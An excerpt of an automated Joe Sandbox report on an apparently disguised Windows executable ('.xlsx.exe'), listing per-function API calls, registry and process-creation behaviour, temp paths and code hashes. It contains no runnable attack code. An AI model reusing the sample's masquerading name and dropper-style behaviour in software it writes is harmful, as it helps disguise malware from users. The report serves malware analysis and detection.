                                                          Function 00402331 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                          • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateValuelstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp
                                                          • API String ID: 1356686001-305309274
                                                          • Opcode ID: 7abd92b05f405a69157af65e26feabc4c7652e6a2ebb012a6e5cdbbd5c9e1c3c
                                                          • Instruction ID: 1c964708cf89b7fac74d07524040b6b2ab84de1cfba919da144199f52892a02b
                                                          • Opcode Fuzzy Hash: 7abd92b05f405a69157af65e26feabc4c7652e6a2ebb012a6e5cdbbd5c9e1c3c
                                                          • Instruction Fuzzy Hash: A51190B1A00108BEEB11EFA4CD89EAFBB7CEB50358F10443AF505B61D1D7B85E409B29
                                                          Function 100018A9 Relevance: 7.7, APIs: 5, Instructions: 189COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1608943585.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.1608921207.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1608963992.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1609013607.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: FreeGlobal
                                                          • String ID:
                                                          • API String ID: 2979337801-0
                                                          • Opcode ID: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                          • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                          • Opcode Fuzzy Hash: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                          • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                          Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                          • GlobalAlloc.KERNEL32(?,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                          • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                          • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1608943585.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.1608921207.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1608963992.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1609013607.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                          • String ID:
                                                          • API String ID: 1148316912-0
                                                          • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                          • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                          • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                          • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                          Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                          • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                          • DeleteObject.GDI32(00000000), ref: 00401D36
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: cd135f4b73005082297d100c57be3cc5053262b6a7e6c2b6d53efd55afb7b6f5
                                                          • Instruction ID: 421c968aeac85d0930bc76aa4bc7d64c85250730bd7c855cb2b2db6532b3540a
                                                          • Opcode Fuzzy Hash: cd135f4b73005082297d100c57be3cc5053262b6a7e6c2b6d53efd55afb7b6f5
                                                          • Instruction Fuzzy Hash: F9F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                          Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          • Opcode ID: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                          • Instruction ID: bea79b3a0ece1bc6ad67d762bc59202c8df9b0d3ac543b92a9f7cfbf89d94624
                                                          • Opcode Fuzzy Hash: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                          • Instruction Fuzzy Hash: 6B217471A44109BEDF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                          Function 00405993 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,00403542), ref: 00405999
                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,00403542), ref: 004059A3
                                                          • lstrcatW.KERNEL32(?,00409014), ref: 004059B5
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405993
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrcatlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 2659869361-4083868402
                                                          • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                          • Instruction ID: a3647a5b8e032715a8ecc0c41ac115d98c53e42c85c632df021e5d83325ae185
                                                          • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                          • Instruction Fuzzy Hash: 74D0A731101930AAD212BB548C04DDF739CEE45301740407BF605B30A1C77C1D418BFD
                                                          Function 00401F08 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                          • GlobalAlloc.KERNEL32(?,00000000,00000000,?,000000EE), ref: 00401F39
                                                          • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                          • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                            • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                          • String ID:
                                                          • API String ID: 1404258612-0
                                                          • Opcode ID: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                          • Instruction ID: 99fd8a33424c76a20816063d32e2a6550cff77f564c1afe2c3b0238effae22d3
                                                          • Opcode Fuzzy Hash: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                          • Instruction Fuzzy Hash: 93113675A00108AECB00DFA5C945DAEBBBAEF44344F20407AF905F62E1D7349E50DB68
                                                          Function 00401E51 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                            • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                            • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll), ref: 0040525F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                            • Part of subcall function 004056C3: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                            • Part of subcall function 004056C3: CloseHandle.KERNEL32(?), ref: 004056F5
                                                          • WaitForSingleObject.KERNEL32(00000000,?,00000000,000000EB,00000000), ref: 00401E80
                                                          • WaitForSingleObject.KERNEL32(?,?,0000000F), ref: 00401E95
                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 3585118688-0
                                                          • Opcode ID: e25249b87139e6aa3da4cb3d5fac545e17d625a69c27f26b2c2935b711216749
                                                          • Instruction ID: 663650117de36b32c607de2b5c5339e49b80fcfff4c178b035665d2e4b1c7066
                                                          • Opcode Fuzzy Hash: e25249b87139e6aa3da4cb3d5fac545e17d625a69c27f26b2c2935b711216749
                                                          • Instruction Fuzzy Hash: 8811A131E00204EBCF109FA0CD449EF7AB5EB44315F20447BE505B62E0C7798A82DBA9
                                                          Function 00405166 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 00405195
                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 004051E6
                                                            • Part of subcall function 004041E6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          • Opcode ID: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                          • Instruction ID: 7fff49106f067b4291516d9fc604604598bdb5380bd5c908914395e8565309e0
                                                          • Opcode Fuzzy Hash: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                          • Instruction Fuzzy Hash: 26015E71900609BBDB205F51ED84B6B3A26E794364F604037FA007A2D1D77A9C919F69
                                                          Function 004056C3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                          • CloseHandle.KERNEL32(?), ref: 004056F5
                                                          Strings
                                                          • Error launching installer, xrefs: 004056D6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: Error launching installer
                                                          • API String ID: 3712363035-66219284
                                                          • Opcode ID: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                          • Instruction ID: 0bf1ed3311e3e942e0a1389e84d80c76f41ccd0b69acab1f7eccde3b1b9dfef0
                                                          • Opcode Fuzzy Hash: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                          • Instruction Fuzzy Hash: D7E0E674E0020AAFDB009F64DD05D6B7B7DF710304F808521A915F2250D7B5E8108A7D
                                                          Function 0040388A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75572EE0,00403861,75573420,0040366C,?), ref: 004038A4
                                                          • GlobalFree.KERNEL32(?), ref: 004038AB
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040389C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Free$GlobalLibrary
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 1100898210-4083868402
                                                          • Opcode ID: dd483a302f27d7fd5815fa17d0cc140b668f4dc35d1ba6fe7e243829f05c23e7
                                                          • Instruction ID: 78adfbc6f23a2b3c20b59446217b09faef23a1eee4c9d5cf742f1d2697954a66
                                                          • Opcode Fuzzy Hash: dd483a302f27d7fd5815fa17d0cc140b668f4dc35d1ba6fe7e243829f05c23e7
                                                          • Instruction Fuzzy Hash: 2FE08C339041205BC621AF25AC08B1AB7A86F89B32F0581B6F9807B2A183746C624BD9
                                                          Function 004059DF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,80000000,00000003), ref: 004059E5
                                                          • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,80000000,00000003), ref: 004059F5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrlen
                                                          • String ID: C:\Users\user\Desktop
                                                          • API String ID: 2709904686-1876063424
                                                          • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                          • Instruction ID: c27c0225baf4744af390cb43684771b46df34b65c4403afa93d532b781e968ba
                                                          • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                          • Instruction Fuzzy Hash: A8D05EB3400920DAD3226B04DC0199F73ACEF1131074644AAF501A21A5DB785D808BBD
                                                          Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(?,?), ref: 1000116A
                                                          • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                          • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                          • GlobalFree.KERNEL32(?), ref: 10001203
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1608943585.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
